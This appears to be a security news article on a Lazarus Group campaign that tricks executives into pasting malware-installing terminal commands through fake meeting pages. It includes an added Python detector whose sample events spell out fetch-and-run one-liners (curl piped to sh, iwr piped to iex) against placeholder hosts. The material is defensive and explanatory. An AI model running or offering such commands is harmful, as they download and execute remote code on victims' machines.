A sophisticated social engineering campaign orchestrated by North Korea’s Lazarus Group is luring cryptocurrency and fintech executives into pasting malicious terminal commands on macOS, aiming to steal credentials and digital assets. Disclosed by blockchain security firm CertiK in April 2026, the campaign—dubbed Mach-O Man—uses fake meeting invitations for Zoom, Microsoft Teams, and Google Meet to trick victims into executing malware. While the technical payload is currently macOS-specific, the attack’s methodology underscores a cross-platform threat that Windows users and organizations must heed.

How the Mach-O Man Campaign Unfolds

The attack begins with a spear-phishing email tailored to high-value targets, often executives with access to crypto wallets or sensitive financial systems. The email includes a calendar invite or link purporting to be for a meeting on a popular video conferencing platform. When the recipient clicks the link, they land on a convincing but fraudulent replica of a Zoom, Teams, or Google Meet page.

Instead of a direct download, the page instructs the user to open the Terminal app on macOS and paste a pre-written command. The command appears legitimate—often disguised as a system update or a necessary component for the meeting—but in reality, it downloads and executes a Mach-O executable, the native binary format for macOS. This multi-step social engineering technique bypasses traditional browser-based download protections because the user voluntarily initiates the dangerous action.

Once executed, the malware establishes persistence and begins harvesting credentials from keychain data, browser password stores, and cryptocurrency wallet applications. It also deploys a backdoor for lateral movement, enabling attackers to pivot within corporate networks if the victim’s machine is connected to an enterprise environment.

The Specialized macOS Payload

The Mach-O Man moniker reflects the malware’s use of the Mach-O file format, a design choice that signals a shift in Lazarus Group’s operations. Historically, the group has favored Windows-based malware, but as macOS adoption grows among developers and crypto entrepreneurs, the attack surface has expanded. The payload shares code similarities with previous Lazarus tools, including the ability to evade signature-based detection by using novel compilation techniques and string obfuscation.

CertiK’s analysis indicates the malware is modular. Its initial dropper—the small script pasted into Terminal—fetches second-stage components from command-and-control servers. These modules include a keylogger, screenshot capture, and the ability to execute arbitrary commands. The focus on crypto wallets is evident: it specifically searches for files related to MetaMask, Ledger Live, Trezor Suite, and other popular wallet applications, transmitting them to attacker-controlled infrastructure.

Lazarus Group: A Persistent Threat

Lazarus Group, also tracked as APT38 or BlueNoroff, is a financially motivated arm of North Korea’s intelligence apparatus. The group has been linked to high-profile heists, including the $600 million Ronin Bridge attack and the theft of $100 million from Harmony’s Horizon Bridge. Its operations fund the regime’s weapons programs, making every incident a matter of global security.

The shift to macOS reflects the group’s agility. In 2023, it used the RustBucket campaign to target macOS via corrupted PDFs. Mach-O Man demonstrates an evolution in delivery methods, leveraging collaboration tool impersonation—a technique that exploded during the remote-work era. By mimicking Zoom, Teams, and Google Meet, the attackers exploit the implicit trust that professionals place in these platforms.

Why Windows Users Are Not Immune

While the current Mach-O Man payload is macOS-specific, the social engineering framework is platform-agnostic. Windows users could face identical phishing lures that direct them to run PowerShell or Command Prompt scripts. Lazarus and other advanced persistent threat (APT) groups have extensive Windows malware arsenals ready to deploy.

Microsoft Defender Threat Intelligence has previously warned of Lazarus impersonating crypto exchanges and job recruiters to distribute Windows trojans like AppleJeus and Vyveva. The fake meeting invite tactic could easily be repurposed: a fraudulent Teams link might instruct a Windows user to press Win+R and paste a PowerShell snippet, leading to the same catastrophic outcome.

Organizations with mixed-device environments are especially vulnerable. A compromised executive’s Mac could give attackers a foothold from which to later target Windows servers and workstations through credential reuse and lateral movement. The fundamental lesson—never paste unknown commands into a terminal or run dialog—applies universally.

Broader Implications for Corporate Security

The Mach-O Man campaign reveals a critical weakness: many enterprises still lack controls to prevent users from executing harmful commands. Endpoint detection and response (EDR) solutions often monitor for known malware signatures or anomalous process chains, but user-initiated terminal actions can blend in with legitimate developer or IT activity.
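One way to make paste-and-run droppers stand out from ordinary developer activity is to look for the fetch-then-execute shape of the pasted one-liner rather than for a known binary. The Python below is an added example, not code from CertiK or from the campaign; it assumes a telemetry feed with `app`, `user` and `cmd` fields (not any vendor’s schema) and runs over a constructed sample.

```python
# Added example (not from the CertiK report): flag paste-and-run droppers in
# command-line telemetry. Event fields `app`, `user`, `cmd` are assumed, not a
# vendor's schema; the sample feed below is constructed.
import re

TERMINALS = {"terminal", "iterm2", "windowsterminal.exe", "powershell.exe", "cmd.exe"}
DOWNLOADERS = {"curl", "wget", "invoke-webrequest", "iwr", "certutil", "bitsadmin"}
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "osascript",
                "powershell", "pwsh", "iex", "invoke-expression"}
TEMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "$tmpdir", "%temp%")
SEPARATORS = re.compile(r"\|\||&&|\||;")


def _stages(cmd):
    # Drop quoting, lower-case, split on pipes/separators; yield each stage's raw
    # tokens plus their basenames so /usr/bin/curl matches "curl"
    bare = cmd.replace('"', "").replace("'", "").lower()
    for seg in SEPARATORS.split(bare):
        toks = seg.split()
        if toks:
            yield toks, {t.rsplit("/", 1)[-1] for t in toks}


def is_fetch_and_execute(cmd):
    """True when one command line downloads content and a later stage runs it."""
    downloaded = False
    for toks, names in _stages(cmd):
        if names & DOWNLOADERS:
            downloaded = True      # payload is now in the pipe or on disk
            continue
        executes = bool(names & INTERPRETERS) or any(t.startswith(TEMP_PREFIXES) for t in toks)
        if downloaded and executes:
            return True
    return False


def triage(events):
    """(user, cmd) pairs typed into an interactive terminal that fetch and run code."""
    return [(e["user"], e["cmd"]) for e in events
            if e["app"].lower() in TERMINALS and is_fetch_and_execute(e["cmd"])]


SAMPLE_EVENTS = [  # constructed; hosts use .invalid and are not indicators
    {"app": "Terminal", "user": "cfo", "cmd": "curl -sL https://meet-fix.example.invalid/u | sh"},
    {"app": "Terminal", "user": "dev", "cmd": "brew update && brew upgrade"},
    {"app": "Terminal", "user": "dev", "cmd": "curl -I https://api.example.invalid/health"},
    {"app": "iTerm2", "user": "ops",
     "cmd": "curl -o /tmp/upd https://x.example.invalid/u; chmod +x /tmp/upd; /tmp/upd"},
    {"app": "powershell.exe", "user": "cfo", "cmd": 'powershell -c "iwr https://x.example.invalid/p | iex"'},
    {"app": "Xcode", "user": "dev", "cmd": "curl -s https://x.example.invalid/a | sh"},
]
```

The benign `brew` and `curl -I` lines pass through while the three fetch-and-run lines from interactive terminals are surfaced, which is the distinction the EDR gap above turns on; the same shape check covers the Win+R/PowerShell variant the article anticipates.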

Security awareness training must evolve beyond spotting phishing emails. Employees—especially high-value targets—need concrete guidance to never execute commands from untrusted sources, even if prompted by a seemingly official website. Technical controls can help: macOS’s Gatekeeper and Windows’ SmartScreen can be complemented with policies that restrict Terminal or PowerShell execution to signed scripts only. However, social engineering can bypass even these safeguards if users are sufficiently deceived.

CertiK’s report emphasizes that the campaign is highly targeted. The fake meeting pages are customized with the victim’s name and company, indicating previous reconnaissance. This level of detail suggests that attackers may have scraped professional networking sites or compromised mailing lists to identify and profile targets.

Defensive Measures for Individuals and Teams

For cryptocurrency holders and fintech executives, immediate steps can reduce risk:

  • Verify meeting links directly — Instead of clicking email links, log into the meeting platform’s official app or website and check for upcoming appointments.
  • Never paste commands from external sources — Treat any instruction to open Terminal, PowerShell, or Command Prompt as a red flag.
  • Use hardware wallets for large crypto holdings — The malware seeks software wallets; hardware devices are harder to compromise.
  • Enable multi-factor authentication (MFA) everywhere — Even if credentials are stolen, MFA can block unauthorized access.
  • Monitor for unusual outbound network traffic — A sudden connection to an unfamiliar IP could indicate data exfiltration.

IT departments should deploy application allowlisting, restrict command-line interpreters for non-IT staff, and regularly simulate social engineering tests that include fake terminal prompts. Sharing threat intelligence through bodies like the Financial Services Information Sharing and Analysis Center (FS-ISAC) can help organizations stay ahead of Lazarus’s evolving playbook.

The Bigger Picture: Cybercrime as Statecraft

The Mach-O Man campaign is not an isolated incident but part of a sustained, state-sponsored effort to siphon funds from the global crypto economy. North Korea’s cyber operations are estimated to generate up to a third of its foreign currency income, according to a UN panel of experts. Each successful attack funds both the regime’s survival and its weapons proliferation.

For Windows users, the takeaway is clear: platform-specific malware is merely one head of a hydra. The underlying social engineering principles are universal. As collaboration tools become more central to business, they will be increasingly weaponized. Vigilance against such threats must be a core component of cyber hygiene, regardless of operating system.

CertiK’s disclosure should serve as a wake-up call for security teams to reassess their defenses against command-execution attacks. With Lazarus Group continually innovating, the line between phishing and system-level compromise has never been thinner—and it’s a line that every user, from the C-suite to the helpdesk, must learn to recognize.